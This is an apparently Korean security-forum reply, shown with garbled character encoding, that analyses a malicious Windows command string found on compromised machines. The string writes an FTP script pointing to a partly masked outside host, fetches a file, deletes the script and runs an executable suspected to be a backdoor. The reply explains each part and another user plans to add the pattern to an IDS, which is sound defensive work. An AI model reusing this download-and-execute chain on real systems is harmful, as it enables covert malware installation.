Å©·¡Å· ÇÇÇØ

 423, 9/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   pr0sp3r
   http://lastlog.com
   [re] rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=226 [º¹»ç]


ÇØ´ç ÄÚµå´Â

cmd /k
echo open x.x.136.76 23825 > o &
echo user 1 1              >> o &
echo quit                  >> o &
ftp -n -s:o &
del /F /Q o &
axdcfasb.exe

À§¿Í °°Àº ÇüÅ·ΠÀÌ·ç¾î Áö¸ç

> ¸®´ÙÀÌ·ºÆ®(Ç¥ÁØÃâ·Â),
>> ¸®´ÙÀÌ·ºÆ®(Ç¥ÁØÃâ·Â Ãß°¡)
& ¹®ÀÚ¿­ Á¢¼ÓÀÚ


cmd.exeÀÇ ÆĶó¸ÞÅ͸¦ ÅëÇÑ ÀǵµÇÑ ÀÛ¾÷À» batch ÆÄÀÏ·Î ftp ÁÖ¼Ò¿Í
À¯Àú¸í/Æнº¿öµå ¸íÀ» ÆÄÀÏ·Î ÀúÀå½ÃŲ ÈÄ
¸¸µé¾îÁø o ÆÄÀÏÀÇ Á¤º¸¸¦ ÀÌ¿ëÇÏ¿© ftp Á¢¼ÓÇÏ°í,
¸¸µé¾îÁø ÆÄÀÏÀ» Áö¿îµÚ
axdcfasb.exe( ¾Æ¸¶µµ ¹éµµ¾î·Î ÀǽɵÊ) ¸¦ ½ÇÇàÇϵµ·Ï µÇ¾îÀֳ׿ä.


À¯»çÇÏ°Ô ÆÄÀÏÀ» ¸¸µé¸é..
-------------------------------------------------------------------------------
C:\DOCUME~1\ADMINI~1>cmd /k echo open 1.1.1.1>test.txt&echo user 1 1>>test.txt&
echo quit>>test.txt

exit

C:\DOCUME~1\ADMINI~1>type test.txt
open 1.1.1.1

C:\DOCUME~1\ADMINI~1>C:\DOCUME~1\ADMINI~1>user 1
quit
--------------------------------------------------------------------------------

À§¿¡¼­ »ç¿ëµÈ ÇÁ·Î±×·¥ÀÇ ÆĶó¸ÞÅÍ ¼³¸íÀÔ´Ï´Ù.

Windows2000 ¸í·É ÀÎÅÍÇÁ¸®ÅÍÀÇ »õ ÀνºÅϽº¸¦ ½ÃÀÛÇÕ´Ï´Ù.
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
    [[/S] [/C | /K] ¹®ÀÚ¿­]

/K      ¹®ÀÚ¿­ÀÌ ÁöÁ¤ÇÑ ¸í·É¾î¸¦ ¼öÇàÇÑ ÈÄ¿¡ °è¼Ó ³²¾ÆÀÖ½À´Ï´Ù.
===============================================================================

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]
-n             Suppresses auto-login upon initial connection.
-s:filename    Specifies a text file containing FTP commands; the
               commands will automatically run after FTP starts.
===============================================================================
DEL [/P] [/F] [/S] [/Q] [/A[[:]Ư¼º]] À̸§
/F            Àбâ Àü¿ë ÆÄÀÏÀ» °­Á¦·Î »èÁ¦ÇÕ´Ï´Ù.
/Q            Á¶¿ëÇÑ ¸ðµå, ±Û·Î¹ú ¿ÍÀϵå Ä«µå¿¡¼­ »èÁ¦Çصµ ¹¯Áö ¾Ê½À´Ï´Ù.
===============================================================================

>´Ù¼öÀÇ ½ºÆÔ¸±·¹ÀÌ È¤Àº ½ºÄ³´× Åø¿¡ µ¿ÀÛÇÏ´Â ÄÄÇ»Å͵鿡
>proceexpolore ·Î È®ÀÎÇغ» °á°ú ¾Æ·¡¿Í °°Àº µ¿ÀÛÀÌ ¼öÇàÁßÀÓÀ» ¾Ë ¼ö ÀÖ¾ú½À´Ï´Ù.
>
>Áß°£¿¡ »ðÀÔµÈ o&´Â ¾î¶² ¿ªÈ°À» ÇÏ´ÂÁö.. ¾Æ·¡ Äڵ忡 ´ëÇÑ »ó¼¼ÇÑ ºÐ¼®À» µµ¿ÍÁֽñ⠹ٶø´Ï´Ù.. °¨»çÇÕ´Ï´Ù..
>
>cmd /k echo open x.x.136.76 23825 > o&echo user 1 1 >> o &echo quti >> o &ftp -n -s:o &del /F /Q o &axdcfasb.exe
>
>¸Å¹ø °í¸¿½À´Ï´Ù...
===============================================================================


  Hit : 3805     Date : 2006/07/07 02:38



    
soarrr ´äº¯ °¨»çµå¸³´Ï´Ù.. ÇØ´ç ÆÐÅÏÀ» IDS ¿¡ µî·ÏÇØ ³ö¾ß°Ú±º¿ä.. 2006/07/10  
ChuRack ¿À... ¸ÚÁ®¿ä... 2006/07/17  
263   °ÔÀÓ ¾ÆÀ̵ð ÇØÅ· ´çÇߴµ¥¿ä..±ÞÇØ¿ä![7]     harry937
02/04 5752
262   keyhook¿¡´ëÇؼ­[3]     dgesc217
02/13 4772
261   À©µµ¿ì2000 ¾îµå¹Î À¯Àú Æнº¿öµå¸¦ ´Ù½Ã ¾Ë¾Æ³¾ ¹æ¹ýÀÌ ÀÖ³ª¿ä?[6]     teago
02/27 4366
260   3¿ù 9ÀÏ 10½Ã 42ºÐ ÇöÀç..[1]     kwoncraft
03/09 3981
259   windows 2000 server ÇØÅ· ..... ´çÇß½À´Ï´Ù. ÇØ°áÃ¥Á»[6]     adueosy
03/20 4475
258   ±ÞÁú¹®ÀÌ¿ä~¾Æ¹«·¡µµ ºí·Î±×ÇØÅ·´çÇÑ°Í °°Àºµ¥¿ä..[10]     sunsunsun
04/07 4262
257   ³Ý¸¶ºí¾ÆÀ̵ð¸¦ÇØÅ·´çÇؼ­±×·±µ¥¿ä..[3]     ¤¾¤ÀÄ¿½ºÄð
05/24 4145
256     [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..[1]     ¸Û¸Û
06/01 4114
255   php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..     soarrr
06/01 3836
254   ÄÄÇ»ÅÍ°¡ ÀÌ»óÇØ¿ä ±ÞÇØ¿ä![3]     skspc2
06/10 3693
253     [re] ÄÄÇ»ÅÍ°¡ ÀÌ»óÇØ¿ä ±ÞÇØ¿ä![1]     ¸Û¸Û
06/10 4010
252     [re] ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..[14]     ¸Û¸Û
06/28 4571
251   ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..     soarrr
06/26 4061
250       [re] [re] ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..[22]     ¸Û¸Û
06/28 10107
249   rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..     soarrr
07/04 3803
    [re] rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..[2]     pr0sp3r
07/07 3804
247   Å©·¡Å· ÇÇÇØ ¸¦ ´çÇß½À´Ï´Ù ![6]     zzangon7
07/29 3809
246   radmin Áú¹®ÀÌ¿ä[2]     cjw13246
08/01 4356
245   Ãʺ¸ÀÚ°¡ ÀÐÀ»¸¸ÇÏ°íÀÐÀ»¼öÀÖ´ÂÃ¥ ÃßõÁ»ÇØÁÖ¼¼¿ä[2]     lasword
08/04 4185
244   ÇØÅ·Åø,ÇØÅ·°ø°ÝÇüŸ¦ percent ·Î º¸¿©Áص¥°¡ ÀÖ³ª¿ä?[2]     segenny
08/08 4025
[1][2][3][4][5][6][7][8] 9 [10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org